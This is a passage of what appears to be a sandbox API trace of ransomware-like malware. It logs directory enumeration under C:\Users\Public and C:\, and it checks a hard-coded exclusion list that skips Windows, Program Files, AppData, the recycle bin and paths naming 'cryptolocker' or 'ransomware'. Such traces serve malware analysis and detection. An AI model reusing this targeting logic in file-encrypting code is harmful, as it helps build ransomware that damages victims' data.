lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.956] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.956] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\appdata\\local\\") returned 0x0 [0119.956] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.956] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.956] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.956] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\boot\\") returned 0x0 [0119.957] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\perflogs\\") returned 0x0 [0119.957] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\programdata\\") returned 0x0 [0119.957] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\drivers\\") returned 0x0 [0119.957] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\wsus\\") returned 0x0 [0119.957] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.957] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.957] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="crypt_detect") returned 0x0 [0119.957] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="cryptolocker") returned 0x0 [0119.957] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="ransomware") returned 0x0 [0119.957] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="C:\\WINDOWS") returned 0x0 [0119.957] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.957] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="C:\\Program Files") returned 0x0 [0119.957] GetProcessHeap () returned 0xe30000 [0119.957] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xef3600 [0119.957] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Public\\Music", cchMax=1068 | out: psz1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0119.957] StrNCatW (in: psz1="C:\\Users\\Public\\Music", psz2="\\*", cchMax=1068 | out: psz1="C:\\Users\\Public\\Music\\*") returned="C:\\Users\\Public\\Music\\*" [0119.957] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0119.957] StrCmpW (psz1=".", psz2=".") returned 0 [0119.957] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.957] StrCmpW (psz1="..", psz2=".") returned 1 [0119.957] StrCmpW (psz1="..", psz2="..") returned 0 [0119.957] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.957] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.957] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.957] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0119.957] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0119.957] GetProcessHeap () returned 0xe30000 [0119.957] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.957] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0119.958] StrCmpW (psz1="Pictures", psz2=".") returned 1 [0119.958] StrCmpW (psz1="Pictures", psz2="..") returned 1 [0119.958] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0119.958] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0119.958] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Pictures", cchMax=1056 | out: psz1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\boot\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\programdata\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\drivers\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\wsus\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="crypt_detect") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="cryptolocker") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="ransomware") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.958] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="C:\\Program Files") returned 0x0 [0119.958] GetProcessHeap () returned 0xe30000 [0119.958] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xef3600 [0119.958] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Public\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0119.958] StrNCatW (in: psz1="C:\\Users\\Public\\Pictures", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\Public\\Pictures\\*") returned="C:\\Users\\Public\\Pictures\\*" [0119.958] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1b30 [0119.959] StrCmpW (psz1=".", psz2=".") returned 0 [0119.959] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.959] StrCmpW (psz1="..", psz2=".") returned 1 [0119.959] StrCmpW (psz1="..", psz2="..") returned 0 [0119.959] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.959] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.959] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.959] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0119.959] FindClose (in: hFindFile=0xec1b30 | out: hFindFile=0xec1b30) returned 1 [0119.959] GetProcessHeap () returned 0xe30000 [0119.959] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.959] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0119.959] StrCmpW (psz1="Videos", psz2=".") returned 1 [0119.959] StrCmpW (psz1="Videos", psz2="..") returned 1 [0119.959] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0119.959] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0119.959] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Videos", cchMax=1056 | out: psz1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0119.959] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\system32\\") returned 0x0 [0119.959] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.959] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\system\\") returned 0x0 [0119.959] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.959] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.959] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\appdata\\local\\") returned 0x0 [0119.959] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.959] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.959] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.959] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\boot\\") returned 0x0 [0119.959] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\perflogs\\") returned 0x0 [0119.959] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\programdata\\") returned 0x0 [0119.959] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\drivers\\") returned 0x0 [0119.960] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\wsus\\") returned 0x0 [0119.960] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.960] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.960] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="crypt_detect") returned 0x0 [0119.960] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="cryptolocker") returned 0x0 [0119.960] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="ransomware") returned 0x0 [0119.960] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="C:\\WINDOWS") returned 0x0 [0119.960] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.960] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="C:\\Program Files") returned 0x0 [0119.960] GetProcessHeap () returned 0xe30000 [0119.960] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ae) returned 0xef3600 [0119.960] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Public\\Videos", cchMax=1070 | out: psz1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0119.960] StrNCatW (in: psz1="C:\\Users\\Public\\Videos", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\Public\\Videos\\*") returned="C:\\Users\\Public\\Videos\\*" [0119.960] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1e30 [0119.960] StrCmpW (psz1=".", psz2=".") returned 0 [0119.960] FindNextFileW (in: hFindFile=0xec1e30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.960] StrCmpW (psz1="..", psz2=".") returned 1 [0119.960] StrCmpW (psz1="..", psz2="..") returned 0 [0119.960] FindNextFileW (in: hFindFile=0xec1e30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.960] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.960] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.960] FindNextFileW (in: hFindFile=0xec1e30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0119.960] FindClose (in: hFindFile=0xec1e30 | out: hFindFile=0xec1e30) returned 1 [0119.960] GetProcessHeap () returned 0xe30000 [0119.960] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.960] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0119.960] FindClose (in: hFindFile=0xec1930 | out: hFindFile=0xec1930) returned 1 [0119.961] GetProcessHeap () returned 0xe30000 [0119.961] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0119.961] FindNextFileW (in: hFindFile=0xec1d30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0119.961] FindClose (in: hFindFile=0xec1d30 | out: hFindFile=0xec1d30) returned 1 [0119.961] GetProcessHeap () returned 0xe30000 [0119.961] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0119.961] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0119.961] StrCmpW (psz1="Windows", psz2=".") returned 1 [0119.961] StrCmpW (psz1="Windows", psz2="..") returned 1 [0119.961] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0119.961] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0119.961] StrNCatW (in: psz1="C:\\", psz2="Windows", cchMax=1030 | out: psz1="C:\\Windows") returned="C:\\Windows" [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\system32\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\system\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\appdata\\local\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\boot\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\perflogs\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\programdata\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\drivers\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\wsus\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch="crypt_detect") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch="cryptolocker") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch="ransomware") returned 0x0 [0119.961] StrStrIW (lpFirst="C:\\Windows", lpSrch="C:\\WINDOWS") returned="C:\\Windows" [0119.961] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 1 [0119.961] StrCmpW (psz1="Windows10Upgrade", psz2=".") returned 1 [0119.962] StrCmpW (psz1="Windows10Upgrade", psz2="..") returned 1 [0119.962] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0119.962] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0119.962] StrNCatW (in: psz1="C:\\", psz2="Windows10Upgrade", cchMax=1030 | out: psz1="C:\\Windows10Upgrade") returned="C:\\Windows10Upgrade" [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\system32\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\system\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\appdata\\local\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\boot\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\perflogs\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\programdata\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\drivers\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\wsus\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="crypt_detect") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="cryptolocker") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="ransomware") returned 0x0 [0119.962] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="C:\\WINDOWS") returned="C:\\Windows10Upgrade" [0119.962] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 0 [0119.962] FindClose (in: 